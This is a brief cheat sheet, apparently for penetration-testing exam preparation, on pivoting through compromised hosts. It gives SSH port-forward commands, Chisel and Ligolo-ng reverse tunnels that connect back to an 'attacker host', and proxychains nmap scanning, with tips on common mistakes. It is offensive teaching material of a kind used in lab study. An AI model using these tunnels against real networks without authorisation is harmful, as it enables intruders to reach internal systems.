Pivoting, Tunneling & Port Forwarding
Post-Exploitation
Overview
Techniques to access internal networks through compromised hosts.
Cheatsheet
SSH Tunneling
ssh -L 8080:10.10.10.6:80 user@10.10.10.5   # Local port forward (reach a remote service on a local port)
ssh -D 9050 user@10.10.10.5                 # Dynamic port forward (SOCKS proxy on local port 9050)
ssh -R 8080:localhost:80 user@10.10.14.5    # Remote port forward (expose a local service on the remote host)
Chisel
# Server (attacker host)
chisel server --reverse -p 8000           # Start Chisel server listening on port 8000
# Client (pivot host)
chisel client 10.10.14.5:8000 R:socks     # Connect back to the server and open a reverse SOCKS tunnel
Ligolo-ng
# Proxy (attacker host)
./proxy -selfcert                              # Start the Ligolo-ng proxy with a self-signed certificate
# Agent (pivot host)
./agent -connect 10.10.14.5:11601 -ignore-cert # Connect the Ligolo-ng agent back to the proxy
Proxychains
proxychains nmap -sT 10.10.10.6   # Scan through the SOCKS proxy (must use a TCP connect scan)
Common Pitfalls
- Forgetting to use -sT with proxychains (SYN and UDP scans do not traverse a SOCKS proxy)
- Not updating proxychains.conf to point at the SOCKS port you actually opened
Exam Survival Tips
- Ligolo-ng is faster than Chisel
- Double-check pivot routes